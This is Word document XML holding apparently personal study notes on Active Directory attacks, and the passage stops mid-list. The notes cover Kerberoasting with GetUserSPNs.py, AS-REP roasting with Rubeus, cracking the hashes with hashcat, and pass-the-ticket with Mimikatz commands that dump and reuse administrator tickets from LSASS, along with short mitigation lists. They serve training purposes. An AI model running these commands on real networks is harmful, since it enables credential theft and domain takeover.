    <w:p w14:paraId="50AB0A13" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>sudo python3 GetUserSPNs.py &lt;domain&gt;/&lt;account&gt;:&lt;password&gt; -dc-ip &lt;ip&gt; -request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE5ABC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>will dump hashes for kerbroastable accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DBC459" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>hashcat -m 13100 -a 0 &lt;saved file&gt; &lt;wordlist&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2508734F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>What Can A Service Account Do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C6388" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>if account is a domain admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C33D56" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>control similar to golden/silver ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5814D96B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dump NTDS.dit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E5BB28" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If not domain admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3249CCD7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>log into other systems and pivot/escalate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54442FBE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>use cracked password to spray against other service and domain admin accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E86B7B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerberoasting Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D703742" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>strong service passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4504B631" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>don’t make service accounts domain admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CE601F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>AS-REP Roasting with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684A7BCC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dumps krbasrep5 hashes of user accounts that have Kerberos pre-authentication disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7C2897" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>do not have to be service accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DD66A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>only requirement to be able to AS-REP roast a user is to have pre-authentication disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038764C6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>if pre-authentication is disabled, a user can request any authentication data for any user and the KDC will return an encrypted TGT that can be cracked offline because KDC skips step of validating the user is real</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C319F3F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Dumping KRBASREP5 Hashes with Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B7313F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Rubeus.exe asreproast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE8ED05" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>crack hashes with hash cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED995F5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>insert 23$ after $krb5asrep$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5ABA3C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>hashcat -m 18200 hash.txt &lt;wordlist&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA76EA9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>AS-REP Roasting Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754CFB38" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>strong password policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E8B88" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>don’t turn off Kerberos Pre-Authen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514BA15E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Pass the Ticket with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A7F7E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>popular and powerful post-exploitation tool most commonly used for dumping user credentials inside of an AD network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F79F7A4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dump TGT from LSASS memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E1383" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Pass the Ticket Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDF66A0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>dumping TGT from LSASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70E063" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>mimikatz with give .kirbi ticket which can be used to gain domain admin if domain admin ticket is in LSASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5D351D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>great for privesc and lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CBA32E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>impersonate tickets using mimikatz PTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3FE91D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Prepare Mimikatz and Dump Tickets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADEC95C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>on attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDFC7BB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE2DC5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702EBA6D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>if 20 ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB2DBF6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>have admin priv to run mimikatz properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD49A8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>sekurlsa::tickets /export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF6AFA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>will export tickets to directory currently in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E7D476" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>search for admin tickets from krbtgt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCE6BF6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Pass the Ticket with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4610A5F1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Kerberos::ptt &lt;ticket&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BAE5D9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. kerberos::ptt [0;1e87bf]</w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28105A66" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
